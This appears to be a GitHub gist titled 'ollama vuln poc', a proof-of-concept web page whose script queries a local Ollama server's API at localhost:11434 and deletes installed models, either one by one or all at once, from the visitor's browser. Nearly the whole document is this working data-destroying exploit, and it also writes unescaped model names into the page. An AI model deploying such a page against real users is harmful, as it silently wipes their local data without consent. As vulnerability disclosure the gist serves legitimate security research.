Created
July 15, 2025 13:45
-
-
Save Atom1cByte/9dd2f0dd4c0b76a637c50cfd471538e9 to your computer and use it in GitHub Desktop.
ollama vuln poc
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta charset="UTF-8"> | |
| <title>Ollama Model List</title> | |
| <style> | |
| body { font-family: sans-serif; margin: 2em; } | |
| #models { margin-top: 1em; } | |
| .error { color: red; } | |
| </style> | |
| </head> | |
| <body> | |
| <h1>Ollama: List Local Models</h1> | |
| <button id="refresh">Refresh Model List</button> | |
| <button id="delete-all">Delete All Models</button> | |
| <div id="models"></div> | |
| <script> | |
| async function fetchModels() { | |
| const modelsDiv = document.getElementById('models'); | |
| modelsDiv.textContent = 'Loading...'; | |
| try { | |
| const res = await fetch('http://localhost:11434/api/tags'); | |
| if (!res.ok) throw new Error('Failed to fetch models'); | |
| const data = await res.json(); | |
| if (!data.models || !Array.isArray(data.models)) { | |
| modelsDiv.innerHTML = '<span class="error">No models found.</span>'; | |
| return; | |
| } | |
| if (data.models.length === 0) { | |
| modelsDiv.innerHTML = '<span>No models installed.</span>'; | |
| return; | |
| } | |
| let html = '<ul>'; | |
| for (const model of data.models) { | |
| html += `<li> | |
| <b>${model.name}</b> — <small>${model.size || ''}</small> | |
| <button data-model="${model.name}" class="delete-btn">Delete</button> | |
| </li>`; | |
| } | |
| html += '</ul>'; | |
| modelsDiv.innerHTML = html; | |
| // Attach delete handlers | |
| document.querySelectorAll('.delete-btn').forEach(btn => { | |
| btn.onclick = async function() { | |
| const modelName = this.getAttribute('data-model'); | |
| this.disabled = true; | |
| this.textContent = 'Deleting...'; | |
| await fetch('http://localhost:11434/api/delete', { | |
| method: 'DELETE', | |
| headers: { 'Content-Type': 'application/json' }, | |
| body: JSON.stringify({ name: modelName }) | |
| }); | |
| fetchModels(); | |
| }; | |
| }); | |
| } catch (e) { | |
| modelsDiv.innerHTML = `<span class="error">${e.message}</span>`; | |
| } | |
| } | |
| document.getElementById('refresh').onclick = fetchModels; | |
| document.getElementById('delete-all').onclick = async function() { | |
| this.disabled = true; | |
| this.textContent = 'Deleting All...'; | |
| const res = await fetch('http://localhost:11434/api/tags'); | |
| if (!res.ok) { | |
| this.disabled = false; | |
| this.textContent = 'Delete All Models'; | |
| return; | |
| } | |
| const data = await res.json(); | |
| if (data.models && Array.isArray(data.models)) { | |
| for (const model of data.models) { | |
| await fetch('http://localhost:11434/api/delete', { | |
| method: 'DELETE', | |
| headers: { 'Content-Type': 'application/json' }, | |
| body: JSON.stringify({ name: model.name }) | |
| }); | |
| } | |
| } | |
| fetchModels(); | |
| this.disabled = false; | |
| this.textContent = 'Delete All Models'; | |
| }; | |
| fetchModels(); | |
| </script> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment